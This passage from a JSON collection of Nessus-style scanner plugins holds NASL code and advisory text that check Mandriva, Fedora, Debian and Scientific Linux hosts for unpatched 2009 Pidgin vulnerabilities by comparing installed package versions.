reference:\"pidgin-mono-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-perl-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-plugins-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-silc-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-tcl-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:22", "description": "This is a bugfix & security fix release of Pidgin. The full ChangeLog\nis available at http://developer.pidgin.im/wiki/ChangeLog Details of\nthe security fixes included are available at\nhttp://www.pidgin.im/news/security/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-06-03T00:00:00", "title": "Fedora 9 : pidgin-2.5.6-1.fc9 (2009-5552)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-06-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:9", "p-cpe:/a:fedoraproject:fedora:pidgin"], "id": "FEDORA_2009-5552.NASL", "href": "https://www.tenable.com/plugins/nessus/38995", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5552.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38995);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-2927\", \"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\");\n script_bugtraq_id(35067);\n script_xref(name:\"FEDORA\", value:\"2009-5552\");\n\n script_name(english:\"Fedora 9 : pidgin-2.5.6-1.fc9 (2009-5552)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a bugfix & security fix release of Pidgin. The full ChangeLog\nis available at http://developer.pidgin.im/wiki/ChangeLog Details of\nthe security fixes included are available at\nhttp://www.pidgin.im/news/security/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://developer.pidgin.im/wiki/ChangeLog\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.pidgin.im/wiki/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.pidgin.im/news/security/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500488\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500490\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500493\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-June/024414.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?129e9b18\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"pidgin-2.5.6-1.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pidgin\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:23", "description": "This is a bugfix & security fix release of Pidgin. The full ChangeLog\nis available at http://developer.pidgin.im/wiki/ChangeLog Details of\nthe security fixes included are available at\nhttp://www.pidgin.im/news/security/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-06-03T00:00:00", "title": "Fedora 10 : pidgin-2.5.6-1.fc10 (2009-5597)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-06-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:pidgin"], "id": "FEDORA_2009-5597.NASL", "href": "https://www.tenable.com/plugins/nessus/38997", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5597.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38997);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-2927\", \"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\");\n script_bugtraq_id(35067);\n script_xref(name:\"FEDORA\", value:\"2009-5597\");\n\n script_name(english:\"Fedora 10 : pidgin-2.5.6-1.fc10 (2009-5597)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a bugfix & security fix release of Pidgin. The full ChangeLog\nis available at http://developer.pidgin.im/wiki/ChangeLog Details of\nthe security fixes included are available at\nhttp://www.pidgin.im/news/security/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://developer.pidgin.im/wiki/ChangeLog\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.pidgin.im/wiki/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.pidgin.im/news/security/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500488\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500490\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500493\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-June/024456.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?649b2295\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"pidgin-2.5.6-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pidgin\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:23", "description": "This is a bugfix & security fix release of Pidgin. The full ChangeLog\nis available at http://developer.pidgin.im/wiki/ChangeLog Details of\nthe security fixes included are available at\nhttp://www.pidgin.im/news/security/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-06-03T00:00:00", "title": "Fedora 11 : pidgin-2.5.6-1.fc11 (2009-5583)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-06-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:11", "p-cpe:/a:fedoraproject:fedora:pidgin"], "id": "FEDORA_2009-5583.NASL", "href": "https://www.tenable.com/plugins/nessus/38996", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5583.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38996);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-2927\", \"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\");\n script_xref(name:\"FEDORA\", value:\"2009-5583\");\n\n script_name(english:\"Fedora 11 : pidgin-2.5.6-1.fc11 (2009-5583)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a bugfix & security fix release of Pidgin. The full ChangeLog\nis available at http://developer.pidgin.im/wiki/ChangeLog Details of\nthe security fixes included are available at\nhttp://www.pidgin.im/news/security/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://developer.pidgin.im/wiki/ChangeLog\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.pidgin.im/wiki/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.pidgin.im/news/security/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500488\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500490\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=500493\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-June/024432.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?61751bdd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"pidgin-2.5.6-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pidgin\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:29", "description": "Several vulnerabilities have been discovered in Pidgin, a graphical\nmulti-protocol instant messaging client. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2009-1373\n A buffer overflow in the Jabber file transfer code may\n lead to denial of service or the execution of arbitrary\n code.\n\n - CVE-2009-1375\n Memory corruption in an internal library may lead to\n denial of service.\n\n - CVE-2009-1376\n The patch provided for the security issue tracked as\n CVE-2008-2927 - integer overflows in the MSN protocol\n handler - was found to be incomplete.\n\nThe old stable distribution (etch) is affected under the source\npackage name gaim. However, due to build problems the updated packages\ncouldn't be released along with the stable version. It will be\nreleased once the build problem is resolved.", "edition": 27, "published": "2009-05-24T00:00:00", "title": "Debian DSA-1805-1 : pidgin - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1373"], "modified": "2009-05-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:pidgin"], "id": "DEBIAN_DSA-1805.NASL", "href": "https://www.tenable.com/plugins/nessus/38878", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1805. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38878);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1375\", \"CVE-2009-1376\");\n script_bugtraq_id(35067);\n script_xref(name:\"DSA\", value:\"1805\");\n\n script_name(english:\"Debian DSA-1805-1 : pidgin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Pidgin, a graphical\nmulti-protocol instant messaging client. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2009-1373\n A buffer overflow in the Jabber file transfer code may\n lead to denial of service or the execution of arbitrary\n code.\n\n - CVE-2009-1375\n Memory corruption in an internal library may lead to\n denial of service.\n\n - CVE-2009-1376\n The patch provided for the security issue tracked as\n CVE-2008-2927 - integer overflows in the MSN protocol\n handler - was found to be incomplete.\n\nThe old stable distribution (etch) is affected under the source\npackage name gaim. However, due to build problems the updated packages\ncouldn't be released along with the stable version. It will be\nreleased once the build problem is resolved.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1373\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-2927\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1805\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the pidgin packages.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"finch\", reference:\"2.4.3-4lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"finch-dev\", reference:\"2.4.3-4lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpurple-bin\", reference:\"2.4.3-4lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpurple-dev\", reference:\"2.4.3-4lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpurple0\", reference:\"2.4.3-4lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin\", reference:\"2.4.3-4lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin-data\", reference:\"2.4.3-4lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin-dbg\", reference:\"2.4.3-4lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin-dev\", reference:\"2.4.3-4lenny2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:44:18", "description": "A buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIf a Pidgin client receives a specially crafted MSN message, it may be\npossible to execute arbitrary code with the permissions of the user\nrunning Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nPidgin must be restarted for this update to take effect.", "edition": 26, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : pidgin on SL3.x, SL4.x, SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20090522_PIDGIN_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60589", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60589);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\");\n\n script_name(english:\"Scientific Linux Security Update : pidgin on SL3.x, SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIf a Pidgin client receives a specially crafted MSN message, it may be\npossible to execute arbitrary code with the permissions of the user\nrunning Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nPidgin must be restarted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0905&L=scientific-linux-errata&T=0&P=1651\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?50f2882c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 